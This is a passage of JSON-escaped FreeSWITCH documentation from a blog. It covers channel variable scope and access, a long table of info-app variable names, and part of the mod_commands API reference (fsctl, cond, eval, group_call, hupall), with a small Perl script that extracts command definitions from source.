data=\u0026ldquo;campaign_id=333814\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;crm_tags=referral new loyal\u0026rdquo; /\u0026gt; In a command issued via mod_xml_rpc or mod_event_socket:\noriginate {lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718b,campaign_id=333814}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Values with spaces must be enclosed by quotes:\noriginate {crm_tags=\u0026lsquo;referral new loyal'}sofia/mydomain.com/18005551212@1.2.3.4 15555551212 Channel Variable Manipulation Channel variables can be manipulated for varied results. For example, a channel variable could be trimmed to get the first three digits of a phone number. Manipulating Channel Variables discusses this in detail. 
Channel Variable Scope Example Consider this example:\n\u0026lt;extension name=\u0026ldquo;test\u0026rdquo; continue=\u0026ldquo;false\u0026rdquo;\u0026gt; \u0026lt;condition field=\u0026ldquo;destination_number\u0026rdquo; expression=\u0026quot;^test([0-9]+)$\u0026quot;\u0026gt; \u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;fruit=tomato\u0026rdquo; /\u0026gt; \u0026lt;action application=\u0026ldquo;export\u0026rdquo; data=\u0026ldquo;veggie=tomato\u0026rdquo; /\u0026gt; \u0026lt;action application=\u0026ldquo;bridge\u0026rdquo; data=\u0026quot;{meat=tomato}sofia/gateway/testaccount/1234\u0026quot; /\u0026gt; \u0026lt;/condition\u0026gt;\u0026lt;/extension\u0026gt; Leg A (the channel that called the dial plan) will have these variables set:\nfruit: tomato\nveggie: tomato Leg B (the channel created with sofia/gateway/testaccount/1234) will have these variables set:\nfruit: tomato\nmeat: tomato Accessing Channel Variables in Other Environments In addition to the dialplan, channel variables can be set in other environments as well. In a FreeSWITCH™ module, written in C:\nswitch_channel_set_variable(channel,\u0026ldquo;name\u0026rdquo;,\u0026ldquo;value\u0026rdquo;);\nchar* result = switch_channel_get_variable(channel,\u0026ldquo;name\u0026rdquo;); char* result = switch_channel_get_variable_partner(channel,\u0026ldquo;name\u0026rdquo;); In the console (or fs_cli, implemented in mod_commands): uuid_getvar \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt; uuid_setvar \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt; [value] uuid_setvar_multi \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt;=\u0026lt;value\u0026gt;[;\u0026lt;var\u0026gt;=\u0026lt;value\u0026gt;[;\u0026hellip;]] Alternatively, call uuid_dump to get all the variables, or use the eval command, adding the prefix variable_ to the key:\nuuid_dump \u0026lt;uuid\u0026gt;\neval uuid:\u0026lt;uuid\u0026gt; ${variable_\u0026lt;key\u0026gt;} In an event socket, just extend the above with the api prefix:\napi uuid_getvar \u0026lt;uuid\u0026gt; \u0026lt;var\u0026gt; In Lua, there are several ways to interact with variables. 
In the freeswitch.Session() invocation that creates a new Session object, variables go in square brackets:\ns = freeswitch.Session(\u0026quot;[myname=myvars]sofia/localhost/1003\u0026quot;) With the new Session object s:\nlocal result1 = s:getVariable(\u0026ldquo;myname\u0026rdquo;) \u0026ndash; \u0026ldquo;myvars\u0026rdquo;s:setVariable(\u0026ldquo;name\u0026rdquo;, \u0026ldquo;value\u0026rdquo;)local result2 = s:getVariable(\u0026ldquo;name\u0026rdquo;) \u0026ndash; \u0026ldquo;value\u0026rdquo; Info Application Variable Names (variable_xxxx) Some variables, as shown from the info app, may have variable_ in front of their names. For example, if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}. Other variables shown in the info app are prepended with channel, which should be stripped as well. The example below show a list of info app variables and the corresponding channel variable names:\nInfo variable name channel variable name Description Channel-State state Current state of the call Channel-State-Number state_number Integer Channel-Name channel_name Channel name Unique-ID uuid uuid of this channel\u0026rsquo;s call leg Call-Direction direction Inbound or Outbound Answer-State state - Channel-Read-Codec-Name read_codec the read codec variable mean the source codec Channel-Read-Codec-Rate read_rate the source rate Channel-Write-Codec-Name write_codec the destination codec same to write_codec if not transcoded Channel-Write-Codec-Rate write_rate destination rate same to read rate if not transcoded Caller-Username username . Caller-Dialplan dialplan user dialplan like xml, lua, enum, lcr Caller-Caller-ID-Name caller_id_name . Caller-Caller-ID-Number caller_id_number . 
Caller-ANI ani ANI of caller, frequently the same as caller ID number Caller-ANI-II aniii ANI II Digits (OLI - Originating Line Information), if available. Refer to: http://www.nanpa.com/number_resource_info/ani_ii_digits.html Caller-Network-Addr network_addr IP address of calling party Caller-Destination-Number destination_number Destination (dialed) number Caller-Unique-ID uuid This channel\u0026rsquo;s uuid Caller-Source source Source module, i.e. mod_sofia, mod_openzap, etc. Caller-Context context Dialplan context Caller-RDNIS rdnis Redirected DNIS info. See mod_dptools: transfer application Caller-Channel-Name channel_name . Caller-Profile-Index profile_index . Caller-Channel-Created-Time created_time . Caller-Channel-Answered-Time answered_time . Caller-Channel-Hangup-Time hangup_time . Caller-Channel-Transfer-Time transfer_time . Caller-Screen-Bit screen_bit . Caller-Privacy-Hide-Name privacy_hide_name . Caller-Privacy-Hide-Number privacy_hide_number This variable tells you if the inbound call is asking for CLIR[Calling Line ID presentation Restriction] (either with anonymous method or Privacy:id method) initial_callee_id_name Sets the callee id name during the 183. This allows the phone to see a name of who they are calling prior to the phone being answered. An example of setting this to the caller id name of the number being dialled: variable_sip_received_ip sip_received_ip . variable_sip_received_port sip_received_port . variable_sip_authorized sip_authorized . variable_sip_mailbox sip_mailbox . variable_sip_auth_username sip_auth_username . variable_sip_auth_realm sip_auth_realm . variable_mailbox mailbox . variable_user_name user_name . variable_domain_name domain_name . variable_record_stereo record_stereo . variable_accountcode accountcode Accountcode for the call. This is an arbitrary value. It can be defined in the user variables in the directory, or it can be set/modified from dialplan. 
The accountcode may be used to force a specific CDR CSV template for the call. variable_user_context user_context . variable_effective_caller_id_name effective_caller_id_name . variable_effective_caller_id_number effective_caller_id_number . variable_caller_domain caller_domain . variable_sip_from_user sip_from_user . variable_sip_from_uri sip_from_uri . variable_sip_from_host sip_from_host . variable_sip_from_user_stripped sip_from_user_stripped . variable_sip_from_tag sip_from_tag . variable_sofia_profile_name sofia_profile_name . variable_sofia_profile_domain_name sofia_profile_domain_name . variable_sip_full_route sip_full_route The complete contents of the Route: header. variable_sip_full_via sip_full_via The complete contents of the Via: header. variable_sip_full_from sip_full_from The complete contents of the From: header. variable_sip_full_to sip_full_to The complete contents of the To: header. variable_sip_req_params sip_req_params . variable_sip_req_user sip_req_user . variable_sip_req_uri sip_req_uri . variable_sip_req_host sip_req_host . variable_sip_to_params sip_to_params . variable_sip_to_tag sip_to_tag . variable_sip_to_user sip_to_user . variable_sip_to_uri sip_to_uri . variable_sip_to_host sip_to_host . variable_sip_contact_params sip_contact_params . variable_sip_contact_user sip_contact_user . variable_sip_contact_port sip_contact_port . variable_sip_contact_uri sip_contact_uri . variable_sip_contact_host sip_contact_host . variable_sip_invite_domain sip_invite_domain . variable_channel_name channel_name . variable_sip_call_id sip_call_id SIP header Call-ID variable_sip_user_agent sip_user_agent . variable_sip_via_host sip_via_host . variable_sip_via_port sip_via_port . variable_sip_via_rport sip_via_rport . variable_presence_id presence_id . variable_sip_h_P-Key-Flags sip_h_p-key-flags This will contain the optional P-Key-Flags header(s) that may be received from calling endpoint. 
variable_switch_r_sdp switch_r_sdp The whole SDP received from calling endpoint. variable_remote_media_ip remote_media_ip . variable_remote_media_port remote_media_port . variable_write_codec write_codec . variable_write_rate write_rate . variable_endpoint_disposition endpoint_disposition . variable_dialed_ext dialed_ext . variable_transfer_ringback transfer_ringback . variable_call_timeout call_timeout . variable_hangup_after_bridge hangup_after_bridge . variable_continue_on_fail continue_on_fail . variable_dialed_user dialed_user . variable_dialed_domain dialed_domain . variable_sip_redirect_contact_user_0 sip_redirect_contact_user_0 . variable_sip_redirect_contact_host_0 sip_redirect_contact_host_0 . variable_sip_h_Referred-By sip_h_referred-by . variable_sip_refer_to sip_refer_to The full SIP URI received from a SIP Refer-To: response variable_max_forwards max_forwards . variable_originate_disposition originate_disposition . variable_read_codec read_codec . variable_read_rate read_rate . variable_open open . variable_use_profile use_profile . variable_current_application current_application . variable_ep_codec_string ep_codec_string This variable is only available if late negotiation is enabled on the profile. It\u0026rsquo;s a readable string containing all the codecs proposed by the calling endpoint. This can be easily parsed in the dialplan. variable_rtp_disable_hold rtp_disable_hold This variable when set will disable the hold feature of the phone. variable_sip_acl_authed_by sip_acl_authed_by This variable holds what ACL rule allowed the call. variable_curl_response_data curl_response_data This variable stores the output from the last curl made. variable_drop_dtmf drop_dtmf Set on a channel to drop DTMF events on the way out. variable_drop_dtmf_masking_file drop_dtmf_masking_file If drop_dtmf is true play specified file for every tone received. 
variable_drop_dtmf_masking_digits drop_dtmf_masking_digits If drop_dtmf is true play specified tone for every tone received. sip_codec_negotiation sip_codec_negotiation sip_codec_negotiation is basically a channel variable equivalent of inbound-codec-negotiation.sip_codec_negotiation accepts \u0026ldquo;scrooge\u0026rdquo; \u0026amp; \u0026ldquo;greedy\u0026rdquo; as values.This means you can change codec negotiation on a per call basis. Caller-Callee-ID-Name - - Caller-Callee-ID-Number - - Caller-Channel-Progress-Media-Time - - Caller-Channel-Progress-Time - - Caller-Direction - - Caller-Profile-Created-Time profile_created - Caller-Transfer-Source - - Channel-Call-State - - Channel-Call-UUID - - Channel-HIT-Dialplan - - Channel-Read-Codec-Bit-Rate - - Channel-Write-Codec-Bit-Rate - - Core-UUID - - Event-Calling-File - - Event-Calling-Function - - Event-Calling-Line-Number - - Event-Date-GMT - - Event-Date-Local - - Event-Date-Timestamp - - Event-Name - - Event-Sequence - - FreeSWITCH-Hostname - - FreeSWITCH-IPv4 - - FreeSWITCH-IPv6 - - FreeSWITCH-Switchname - - Hunt-ANI - - Hunt-Callee-ID-Name - - Hunt-Callee-ID-Number - - Hunt-Caller-ID-Name - - Hunt-Caller-ID-Number - - Hunt-Channel-Answered-Time - - Hunt-Channel-Created-Time - - Hunt-Channel-Hangup-Time - - Hunt-Channel-Name - - Hunt-Channel-Progress-Media-Time - - Hunt-Channel-Progress-Time - - Hunt-Channel-Transfer-Time - - Hunt-Context - - Hunt-Destination-Number - - Hunt-Dialplan - - Hunt-Direction - - Hunt-Network-Addr - - Hunt-Privacy-Hide-Name - - Hunt-Privacy-Hide-Number - - Hunt-Profile-Created-Time profile_created - Hunt-Profile-Index - - Hunt-RDNIS - - Hunt-Screen-Bit - - Hunt-Source - - Hunt-Transfer-Source - - Hunt-Unique-ID - - Hunt-Username - - Presence-Call-Direction - - variable_DIALSTATUS - - variable_absolute_codec_string - - variable_advertised_media_ip - - variable_answersec variable_answermsec variable_answerusec variable_billsec variable_billmsec variable_billusec variable_bridge_channel 
- - variable_bridge_hangup_cause - - variable_bridge_uuid - - variable_call_uuid - - variable_current_application_response - - variable_direction - - variable_duration variable_mduration variable_uduration variable_inherit_codec - - variable_is_outbound - - variable_last_bridge_to - - variable_last_sent_callee_id_name - - variable_last_sent_callee_id_number - - variable_local_media_ip - - variable_local_media_port - - variable_number_alias - - variable_originate_early_media - - variable_originating_leg_uuid - - variable_originator - - variable_originator_codec - - variable_outbound_caller_id_number - - variable_progresssec variable_progressmsec variable_progressusec variable_progress_mediasec variable_progress_mediamsec variable_progress_mediausec variable_recovery_profile_name - - variable_rtp_use_ssrc - - variable_session_id - - variable_sip_2833_recv_payload - - variable_sip_2833_send_payload - - variable_sip_P-Asserted-Identity - - variable_sip_Privacy - - variable_sip_audio_recv_pt - - variable_sip_cid_type - - variable_sip_cseq - - variable_sip_destination_url - - variable_sip_from_display sip_from_display \u0026lsquo;User\u0026rsquo; element of SIP From: line variable_sip_from_port - - variable_sip_gateway - - variable_sip_gateway_name - - variable_sip_h_P-Charging-Vector - - variable_sip_local_network_addr - - variable_sip_local_sdp_str - - variable_sip_network_ip - - variable_sip_network_port - - variable_sip_number_alias - - variable_sip_outgoing_contact_uri - - variable_sip_ph_P-Charging-Vector - - variable_sip_profile_name - - variable_sip_recover_contact - - variable_sip_recover_via - - variable_sip_reply_host - - variable_sip_reply_port - - variable_sip_req_port - - variable_sip_to_port - - variable_sip_use_codec_name - - variable_sip_use_codec_ptime - - variable_sip_use_codec_rate - - variable_sip_use_pt - - variable_sip_via_protocol - - variable_switch_m_sdp - - variable_transfer_history - - variable_transfer_source - - variable_uuid - - 
variable_waitsec variable_waitmsec variable_waitusec ","permalink":"https://wdd.js.org/freeswitch/channel-var-list/","summary":"About Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up.\nVariable Expansion We rely on variable expansion to create flexible, reusable dialplans:","title":"通道变量列表"},{"content":"\nUsage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:\nInvoke API Command From Dialplan\nOther examples:\nOther Dialplan API Command Examples\nAPI commands with multiple arguments usually have the arguments separated by a space:\nMultiple Arguments\nDialplan Usage\nIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for. See mod_dptools for a list of dialplan applications, they are quite extensive. Extraction Script Mitch Capper wrote a Perl script to extract commands from mod_commands source code. 
It\u0026rsquo;s tailored specifically for extracting from mod_commands but should work for most other files.Extraction Perl Script#!/usr/bin/perluse strict;open (fl,\u0026ldquo;src/mod/applications/mod_commands/mod_commands.c\u0026rdquo;);my $cont;{ local $/ = undef; $cont = ;}close fl;my %DEFINES;my $reg_define = qr/[A-Za-z0-9_]+/;my $reg_function = qr/[A-Za-z0-9_]+/;my $reg_string_or_define = qr/(?:(?:$reg_define)|(?:\u0026quot;[^\u0026quot;]*\u0026quot;))/;\n#load defineswhile ($cont =~ / ^\\s* #define \\s+ ($reg_define) \\s+ \u0026quot;([^\u0026quot;]*)\u0026quot; /mgx){ warn \u0026ldquo;$1 is #defined multiple times\u0026rdquo; if ($DEFINES{$1}); $DEFINES{$1} = $2;}\nsub resolve_str_or_define($){ my ($str) = @_; if ($str =~ s/^\u0026quot;// \u0026amp;\u0026amp; $str =~ s/\u0026quot;$//){ #if starts and ends with a quote strip them off and return the str return $str; } warn \u0026ldquo;Unable to resolve define: $str\u0026rdquo; if (! $DEFINES{$str}); return $DEFINES{$str};}#parse commandswhile ($cont =~ / SWITCH_ADD_API \\s* ( ([^,]+) #interface $1 ,\\s* ($reg_string_or_define) # command $2 ,\\s* ($reg_string_or_define) # command description $3 ,\\s* ($reg_function) # function $4 ,\\s* ($reg_string_or_define) # usage $5 \\s*); /sgx){ my ($interface,$command,$descr,$function,$usage) = ($1,$2,$3,$4,$5); $command = resolve_str_or_define($command); $descr = resolve_str_or_define($descr); $usage = resolve_str_or_define($usage); warn \u0026ldquo;Found a not command interface of: $interface for command: $command\u0026rdquo; if ($interface ne \u0026ldquo;commands_api_interface\u0026rdquo;); print \u0026ldquo;$command \u0026ndash; $descr \u0026ndash; $usage\\n\u0026rdquo;;} Core Commands Implemented in http://fisheye.freeswitch.org/browse/freeswitch.git/src/mod/applications/mod_commands/mod_commands.cFormat of Returned DataResults of some status and listing commands are presented in comma delimited lists by default. 
Data returned from some modules may also contain commas, making it difficult to automate result processing. They may be able to be retrieved in an XML format by appending the string \u0026ldquo;as xml\u0026rdquo; to the end of the command string, or as json using \u0026ldquo;as json\u0026rdquo;, or change the delimiter from comma to something else using \u0026ldquo;as delim |\u0026rdquo;. acl Compare an ip to an Access Control ListUsage: acl \u0026lt;list_name\u0026gt; alias Alias: a means to save some keystrokes on commonly used commands.Usage: alias add | del [|*]Example:freeswitch\u0026gt; alias add reloadall reloadacl reloadxml+OKfreeswitch\u0026gt; alias add unreg sofia profile internal flush_inbound_reg+OKYou can add aliases that persist across restarts using the stickyadd argument:freeswitch\u0026gt; alias stickyadd reloadall reloadacl reloadxml+OKOnly really works from the console, not fs_cli. bgapi Execute an API command in a thread.Usage: bgapi [ ] complete Complete.Usage: complete add |del [|*] cond Evaluate a conditional expression.Usage: cond ? : Operators supported by are:\n== (equal to) != (not equal to) (greater than)\n= (greater than or equal to)\n\u0026lt; (less than) \u0026lt;= (less than or equal to) How are values compared?\ntwo strings are compared as strings two numbers are compared as numbers a string and a number are compared as strlen(string) and numbers For example, foo == 3 evaluates to true, and foo == three to false.\nExamples (click to expand)\nExample:Return true if first value is greater than the secondcond 5 \u0026gt; 3 ? true : falsetrueExample in dialplan:Slightly more complex example:\nNote about syntaxThe whitespace around the question mark and colon are required since FS-5945. Before that, they were optional. If the spaces are missing, the cond function will return -ERR. domain_exists Check if a FreeSWITCH domain exists.Usage: domain_exists eval Eval (noop). Evaluates a string, expands variables. 
Those variables that are set only during a call session require the uuid of the desired session or else return \u0026ldquo;-ERR no reply\u0026rdquo;.Usage: eval [uuid: ]Examples:eval ${domain}10.15.0.94eval Hello, World!Hello, World!eval uuid:e72aff5c-6838-49a8-98fb-84c90ad840d9 ${channel-state}CS_EXECUTE expand Execute an API command with variable expansion.Usage: expand [uuid: ] Example:expand originate sofia/internal/1001%${domain} 9999In this example the value of ${domain} is expanded. If the domain were, for example, \u0026ldquo;192.168.1.1\u0026rdquo; then this command would be executed:originate sofia/internal/1001%192.168.1.1 9999 fsctl Send control messages to FreeSWITCH.USAGE: fsctl [ api_expansion [on|off] | calibrate_clock | debug_level [level] | debug_sql | default_dtmf_duration [n] | flush_db_handles | hupall | last_sps | loglevel [level] | max_dtmf_duration [n] | max_sessions [n] | min_dtmf_duration [n] | min_idle_cpu [d] | pause [inbound|outbound] | pause_check [inbound|outbound] | ready_check | reclaim_mem | recover | resume [inbound|outbound] | save_history | send_sighup | shutdown [cancel|elegant|asap|now|restart] | shutdown_check | sps | sps_peak_reset | sql [start] | sync_clock | sync_clock_when_idle | threaded_system_exec | verbose_events [on|off] ]\nfsctl arguments api_expansion Usage: fsctl api_expansion [on|off]Toggles API expansion. With it off, no API functions can be expanded inside channel variables like ${show channels} This is a specific security mode that is not often used. calibrate_clock Usage: fsctl calibrate_clockRuns an algorithm to compute how long it actually must sleep in order to sleep for a true 1ms. It\u0026rsquo;s only useful in older kernels that don\u0026rsquo;t have timerfd. In those older kernels FS auto detects that it needs to do perform that computation. This command just repeats the calibration. **debug_level ** Usage: fsctl debug_level [level]Set the amount of debug information that will be posted to the log. 
1 is less verbose while 9 is more verbose. Additional debug messages will be posted at the ALERT loglevel.0 - fatal errors, panic1 - critical errors, minimal progress at subsystem level2 - non-critical errors3 - warnings, progress messages5 - signaling protocol actions (incoming packets, \u0026hellip;)7 - media protocol actions (incoming packets, \u0026hellip;)9 - entering/exiting functions, very verbatim progress\ndebug_sql Usage: fsctl debug_sqlToggle core SQL debugging messages on or off each time this command is invoked. Use with caution on busy systems. In order to see all messages issue the \u0026ldquo;logelevel debug\u0026rdquo; command on the fs_cli interface. default_dtmf_duration Usage: fsctl default_dtmf_duration [int]int = number of clock ticksExample:fsctl default_dtmf_duration 2000This example sets the default_dtmf_duration switch parameter to 250ms. The number is specified in clock ticks (CT) where duration (milliseconds) = CT / 8 or CT = duration * 8The default_dtmf_duration specifies the DTMF duration to use on originated DTMF events or on events that are received without a duration specified. This value is bounded on the lower end by min_dtmf_duration and on the upper end by max_dtmf_duration. So max_dtmf_duration \u0026gt;= default_dtmf_duration \u0026gt;= min_dtmf_duration . This value can be set persistently in switch.conf.xmlTo check the current value:fsctl default_dtmf_duration 0FS recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. flush_db_handles Usage: fsctl flush_db_handlesFlushes cached database handles from the core db handlers. FreeSWITCH reuses db handles whenever possible, but a heavily loaded FS system can accumulate a large number of db handles during peak periods while FS continues to allocate new db handles to service new requests in a FIFO manner. 
\u0026ldquo;fsctl flush_db_handles\u0026rdquo; closes db connections that are no longer needed to avoid exceeding connections to the database server. hupall Usage: fsctl hupall \u0026lt;clearing_type\u0026gt; dialed_ext Disconnect existing calls to a destination and post a clearing cause.For example, to kill an active call with normal clearing and the destination being extension 1000:fsctl hupall normal_clearing dialed_ext 1000 last_sps Usage: fsctl last_spsQuery the actual sessions-per-second.fsctl last_sps+OK last sessions per second: 723987253(Your mileage might vary.) loglevel Usage: fsctl loglevel [level]Filter how much detail the log messages will contain when displayed on the fs_cli interface. See mod_console for legal values of \u0026ldquo;level\u0026rdquo; and further discussion.The available loglevels can be specified by number or name:0 - CONSOLE1 - ALERT2 - CRIT3 - ERR4 - WARNING5 - NOTICE6 - INFO7 - DEBUG max_sessions Usage: fsctl max_sessions [int]Set how many simultaneous call sessions FS will allow. This value can be ascertained by load testing, but is affected by processor speed and quantity, network and disk bandwidth, choice of codecs, and other factors. See switch.conf.xml for the persistent setting max-sessions. max_dtmf_duration Usage: fsctl max_dtmf_duration [int]Default = 192000 clock ticksExample:fsctl max_dtmf_duration 80000This example sets the max_dtmf_duration switch parameter to 10,000ms (10 seconds). The integer is specified in clock ticks (CT) where CT / 8 = ms. The max_dtmf_duration caps the playout of a DTMF event at the specified duration. Events exceeding this duration will be truncated to this duration. You cannot configure a duration that exceeds this setting. This setting can be lowered, but cannot exceed 192000 (the default). This setting cannot be set lower than min_dtmf_duration.
This setting can be set persistently in switch.conf.xml as max-dtmf-duration.To query the current value:fsctl max_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. min_dtmf_duration Usage: fsctl min_dtmf_duration [int]Default = 400 clock ticksExample:fsctl min_dtmf_duration 800This example sets the min_dtmf_duration switch parameter to 100ms. The integer is specified in clock ticks (CT) where CT / 8 = ms. The min_dtmf_duration specifies the minimum DTMF duration to use on outgoing events. Events shorter than this will be increased in duration to match min_dtmf_duration. You cannot configure a DTMF duration on a profile that is less than this setting. You may increase this value, but cannot set it lower than 400 (the default). This value cannot exceed max_dtmf_duration. This setting can be set persistently in switch.conf.xml as min-dtmf-duration.It is worth noting that many devices squelch in-band DTMF when sending RFC 2833. Devices that squelch in-band DTMF have a certain reaction time and clamping time which can sometimes reach as high as 40ms, though most can do it in less than 20ms. As the shortness of your DTMF event duration approaches this clamping threshold, the risk of your DTMF being ignored as a squelched event increases. If your call is always IP-IP the entire route, this is likely not a concern. However, when your call is sent to the PSTN, the RFC 2833 DTMF events must be encoded in the audio stream. This means that other devices down the line (possibly a PBX or IVR that you are calling) might not hear DTMF tones that are long enough to decode and so will ignore them entirely. For this reason, it is recommended that you do not send DTMF events shorter than 80ms.Checking the current value:fsctl min_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. 
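The clock-tick arithmetic used by default_dtmf_duration, max_dtmf_duration, and min_dtmf_duration above (ms = CT / 8, with the default bounded between min and max) can be sketched as follows. This is an illustrative helper, not a FreeSWITCH API; the function names are mine.

```python
# Sketch of the DTMF duration arithmetic described above.
# FreeSWITCH specifies durations in clock ticks (CT), where ms = CT / 8.
MIN_DTMF_CT = 400      # min_dtmf_duration default (50 ms)
MAX_DTMF_CT = 192000   # max_dtmf_duration default (24 s)

def ticks_to_ms(ct):
    return ct / 8

def ms_to_ticks(ms):
    return ms * 8

def clamp_dtmf(ct, lo=MIN_DTMF_CT, hi=MAX_DTMF_CT):
    """Events shorter than min are stretched up; longer than max are truncated."""
    return max(lo, min(ct, hi))

print(ticks_to_ms(2000))   # the 'fsctl default_dtmf_duration 2000' example: 250.0 ms
print(clamp_dtmf(100))     # stretched up to the 400 CT minimum
print(clamp_dtmf(300000))  # truncated to the 192000 CT maximum
```

This mirrors the documented ordering max_dtmf_duration \u0026gt;= default_dtmf_duration \u0026gt;= min_dtmf_duration.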
min_idle_cpu Usage: fsctl min_idle_cpu [int]Allocates the minimum percentage of CPU idle time available to other processes to prevent FreeSWITCH from consuming all available CPU cycles.Example:fsctl min_idle_cpu 10This allocates a minimum of 10% CPU idle time which is not available for processing by FS. Once FS reaches 90% CPU consumption it will respond with cause code 503 to additional SIP requests until its own usage drops below 90%, while reserving that last 10% for other processes on the machine. pause Usage: fsctl pause [inbound|outbound]Pauses the ability to receive inbound or originate outbound calls, or both directions if the keyword is omitted. Executing fsctl pause inbound will also prevent registration requests from being processed. Executing fsctl pause outbound will result in the Critical log message \u0026ldquo;The system cannot create any outbound sessions at this time\u0026rdquo; in the FS log.Use resume with the corresponding argument to restore normal operation. pause_check Usage: fsctl pause_check [inbound|outbound]Returns true if the specified mode is active.Examples:fsctl pause_check inboundtrueindicates that inbound calls and registrations are paused. Use fsctl resume inbound to restore normal operation.fsctl pause_checktrueindicates that both inbound and outbound sessions are paused. Use fsctl resume to restore normal operation. ready_check Usage: fsctl ready_checkReturns true if the system is in the ready state, as opposed to awaiting an elegant shutdown or other not-ready state. reclaim_mem Usage: fsctl reclaim_mem recover Usage: fsctl recoverSends an endpoint–specific recover command to each channel detected as recoverable. This replaces “sofia recover” and makes it possible to have multiple endpoints besides SIP implement recovery. 
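The min_idle_cpu admission rule above can be sketched as a simple threshold check. This is a hypothetical illustration (the helper name is mine, not part of FreeSWITCH): with min_idle_cpu 10, FS serves requests while its own CPU consumption stays below 90% and answers 503 otherwise.

```python
def accepts_new_requests(cpu_busy_pct, min_idle_cpu=10.0):
    # FS reserves min_idle_cpu percent of idle time for other processes;
    # once its consumption reaches (100 - min_idle_cpu) it responds 503.
    return cpu_busy_pct < (100.0 - min_idle_cpu)

print(accepts_new_requests(85))  # True: 15% idle remains
print(accepts_new_requests(95))  # False: 503 until usage drops below 90%
```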
resume Usage: fsctl resume [inbound|outbound]Resumes normal operation after pausing inbound, outbound, or both directions of call processing by FreeSWITCH.Example:fsctl resume inbound+OKResumes processing of inbound calls and registrations. Note that this command always returns +OK, but the same keyword must be used that corresponds to the one used in the pause command in order to take effect. save_history Usage: fsctl save_historyWrite out the command history in anticipation of executing a configuration that might crash FS. This is useful when debugging a new module or script to allow other developers to see what commands were executed before the crash. send_sighup Usage: fsctl send_sighupDoes the same thing that killing the FS process with -HUP would do without having to use the UNIX kill command. Useful in environments like Windows where there is no kill command or in cron or other scripts by using fs_cli -x \u0026ldquo;fsctl send_sighup\u0026rdquo; where the FS user process might not have privileges to use the UNIX kill command. shutdown Usage: fsctl shutdown [asap|asap restart|cancel|elegant|now|restart|restart asap|restart elegant]\ncancel - discontinue a previous shutdown request. elegant - wait for all traffic to stop, while allowing new traffic. asap - wait for all traffic to stop, but deny new traffic. now - shutdown FreeSWITCH immediately. restart - restart FreeSWITCH immediately following the shutdown. When giving \u0026ldquo;elegant\u0026rdquo;, \u0026ldquo;asap\u0026rdquo; or \u0026ldquo;now\u0026rdquo; it\u0026rsquo;s also possible to add the restart command: shutdown_check Usage: fsctl shutdown_checkReturns true if FS is shutting down, or shutting down and restarting. sps Usage: fsctl sps [int]This changes the sessions-per-second limit from the value initially set in switch.conf sync_clock Usage: fsctl sync_clockFreeSWITCH will not trust the system time. 
It gets one sample of system time when it first starts and uses the monotonic clock after that moment. You can sync it back to the current value of the system\u0026rsquo;s real-time clock with fsctl sync_clockNote: fsctl sync_clock immediately takes effect, which can affect the times on your CDRs. You can end up underbilling/overbilling, or even calls hung up before they originated. e.g. if FS clock is off by 1 month, then your CDRs will show calls that lasted for 1 month!See fsctl sync_clock_when_idle which is much safer. sync_clock_when_idle Usage: fsctl sync_clock_when_idleSynchronize the FreeSWITCH clock to the host machine\u0026rsquo;s real-time clock, but wait until there are 0 channels in use. That way it doesn\u0026rsquo;t affect any CDRs. verbose_events Usage: fsctl verbose_events [on|off]Enables verbose events. Verbose events have every channel variable in every event for a particular channel. Non-verbose events have only the pre-selected channel variables in the event headers.See switch.conf.xml for the persistent setting of verbose-channel-events.\nglobal_getvar Gets the value of a global variable. If the parameter is not provided then it gets all the global variables.Usage: global_getvar [] global_setvar Sets the value of a global variable.Usage: global_setvar =Example:global_setvar outbound_caller_id=2024561000 group_call Returns the bridge string defined in a call group.Usage: group_call group@domain[+F|+A|+E]+F will return the group members in a serial fashion separated by | (the pipe character)+A (default) will return them in a parallel fashion separated by , (comma)+E will return them in an enterprise fashion separated by :_: (colon underscore colon).There is no space between the domain and the optional flag.
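The three group_call separator modes (+F serial, +A parallel, +E enterprise) can be illustrated with a small sketch that joins a member list the way the returned bridge string is formatted. The helper and member names are hypothetical, for illustration only.

```python
# Illustration of group_call's three bridge-string formats.
SEPARATORS = {
    "+F": "|",     # serial
    "+A": ",",     # parallel (the default)
    "+E": ":_:",   # enterprise
}

def bridge_string(members, flag="+A"):
    return SEPARATORS[flag].join(members)

members = ["user/1001", "user/1002", "user/1003"]
print(bridge_string(members, "+F"))  # user/1001|user/1002|user/1003
print(bridge_string(members))        # user/1001,user/1002,user/1003
print(bridge_string(members, "+E"))  # user/1001:_:user/1002:_:user/1003
```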
See Groups in the XML User Directory for more information.Please note: If you need to have outgoing user variables set in leg B, make sure you don\u0026rsquo;t have dial-string and group-dial-string in your domain or dialed group variables list; instead set dial-string or group-dial-string in the default group of the user. This way group_call will return user/101 and user/ would set all your user variables to the leg B channel.The B leg receives a new variable, dialed_group, containing the full group name. help Show help for all the API commands.Usage: help host_lookup Performs a DNS lookup on a host name.Usage: host_lookup hupall Disconnect existing channels.Usage: hupall [ ]All channels with set to will be disconnected with code.Example:originate {foo=bar}sofia/internal/someone1@server.com,sofia/internal/someone2@server.com \u0026amp;parkhupall normal_clearing foo barTo hang up all calls on the switch indiscriminately:hupall system_shutdown in_group Determine if a user is a member of a group.Usage: in_group [@] \u0026lt;group_name\u0026gt; is_lan_addr See if an IP is a LAN address.Usage: is_lan_addr json JSON APIUsage: json {\u0026ldquo;command\u0026rdquo; : 